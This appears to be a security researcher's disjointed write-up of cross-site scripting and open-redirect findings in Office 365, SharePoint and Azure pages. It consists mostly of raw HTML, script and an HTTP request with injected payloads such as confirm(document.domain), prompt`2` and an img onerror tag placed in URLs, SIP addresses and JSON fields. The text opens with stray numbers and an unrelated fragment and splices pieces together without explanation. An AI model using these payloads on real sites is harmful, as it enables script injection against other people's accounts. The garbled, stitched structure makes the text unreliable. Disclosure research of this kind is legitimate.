@
published on June 19, 2016 by @nilesh_loganx
8,4,7,19,2,5,8,9,12,3,2,10 an 7 ... You have to keep in mind all the time what is happening in individual email threads ...
Case 40606 was created internally. The original bug report has a case number 40509.
<script>
(function(global, $, undefined) {
"use strict";
$(function() {
var fismaContainer = $("#fisma-container");
fismaContainer.find(":button").click(function() {
// Disable any buttons after they are clicked (only allows them to be clicked once)
fismaContainer.find(":button").prop("disabled", true);
});
// Handle the clicking of the agree button
fismaContainer.find(".agree-button").click(function() {
global.location.href = "CAN BE USER CONTROLLED VIA returnUrl GET PARAMETER";
});
// Handle the clicking of the disagree button
fismaContainer.find(".disagree-button").click(function() {
global.location.href = "https://account.windowsazure.com/Home/Logoff?returnUrl=https%3a%2f%2faccount.windowsazure.com%2f";
});
});
})(this, jQuery);
</script>
Now a new connector form has been changed slightly and is available at https://outlook.office.com/connectors/home/login/#/new
<input id="copy_btn2"
title="Copy Code"
value="copy"
class="copy_codeImage"
src="/connectors/Content/Images/copy-code.png"
style="margin-right: 0px"
onclick="CopyCodeToClipboard('webhookUrl',
'<a href="https://outlook.office.com/connectors/Connect?state=myAppsState
&app_id=23ef489c-73f1-4236-b7d3-6651f7085b19&
callback_url=https://www.ANYVALIDURL.com?'-confirm(document.domain)-'
"><img src="https://o365connectors.blob.core.windows.net/images/ConnectToO365Button.png" alt="Connect to Office 365"></img></a>', this)"
type="image">
<div id="ctl00_ctl33_g_c68d5984_ee44_4ebd_ac06_d0d7e87bbd97">
<table style="width:100%;">
<tr>
<td valign="top"></td><td valign="top"><SPAN><span class='ms-imnSpan'>
<a href='#' onclick='IMNImageOnClick(event);return false;' class='ms-imnlink'>
<span class='ms-spimn-presenceWrapper ms-imnImg ms-spimn-imgSize-10x10'>
<img title='' alt='' name='imnmark'
class='ms-spimn-img ms-spimn-presence-disconnected-10x10x32' src='/_layouts/15/images/spimn.png'
showofflinepawn='1' sip=''-prompt`2`-'@iamcompany.onmicrosoft.com'
id='imn_contactctl00$ctl33$g_c68d5984_ee44_4ebd_ac06_d0d7e87bbd97,type=sip'
onload="var _This = this; SP.SOD.executeFunc('portal.js', 'QueuePopulateIMNRC',
function(){QueuePopulateIMNRC(''-prompt`2`-'@iamcompany.onmicrosoft.com',_This);});" />
</span></a></span></SPAN><img alt="" height=1 width=3 src="/_layouts/15/images/trans.gif"></td>
<td class="ms-vb" valign="top" style="width:100%;"><div class='ms-vb'>
<a href="https://iamcompany-my.sharepoint.com:443/Person.aspx?accountname=i%3A0%23%2Ef%7Cmembership%7C%27%2Dprompt%2D%27%40iamcompany%2Eonmicrosoft%2Ecom">testuser</a></div></td>
</tr>
</table>
</div>
POST /Ucc/DDI/DDIService.svc/GetObject?... HTTP/1.1
Host: protection.office.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://protection.office.com/Ucc/Pickers/SharepointSitePicker.aspx
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=utf-8
Content-Length: 226
Cookie: ...
...
...
...
Connection: close
{"identity":
{
"RawIdentity":"https://<SharePoint URL>?</script><img src=x onerror=confirm(1)>",
"DisplayName":"https://<SharePoint URL>?</script><img src=x onerror=confirm(1)>"
}
}
<input value="Go to group"
onclick=
"window.location.href='https://outlook.office365.com/owa/?path=/group/zzz'-prompt`1`-'zzzz@iamcompany.onmicrosoft.com/mail';
this.disabled = true" style="height: 30px;width: 100px; border: 1px solid #0072C6;
font-weight: bold; color:white; font-size: 12px;
line-height: 12px; background-color: #0072C6;" <="" input="" type="button">